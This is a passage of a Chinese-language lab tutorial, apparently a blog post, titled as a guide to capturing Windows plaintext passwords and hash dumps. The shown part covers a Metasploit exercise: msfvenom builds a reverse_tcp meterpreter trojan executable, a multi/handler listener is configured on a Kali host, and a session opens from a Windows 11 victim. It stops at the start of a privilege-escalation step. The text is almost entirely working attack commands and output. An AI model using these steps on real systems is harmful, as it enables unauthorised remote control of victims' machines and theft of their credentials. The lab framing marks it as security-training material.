抓取内网Windows明文密码与hashdump抓取密文
一、msf远程控制实验
实验准备:
kali:192.168.111.129
win11:192.168.111.145
1、生成一个木马控制程序–mpf.exe
┌──(root㉿kali)-[~]
└─# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.129 lport=2331 -f exe > /root/mpf.exe
2、启用MSF攻击平台
┌──(root㉿kali)-[~]
└─# msfconsole
3、加载模块和选择payload
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
4、设置payload参数并且进行监听
msf6 exploit(multi/handler) > set lhost 192.168.111.129
lhost => 192.168.111.129
msf6 exploit(multi/handler) > set lport 2331
lport => 2331
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.111.129:2331
[*] Sending stage (175686 bytes) to 192.168.111.145
[*] Meterpreter session 2 opened (192.168.111.129:2331 -> 192.168.111.145:51668) at 2024-04-20 01:08:17 -0400
5、提权
meterpreter > uuid
[+] UUID: 6fa875f1b3ab9044/x86=1/wi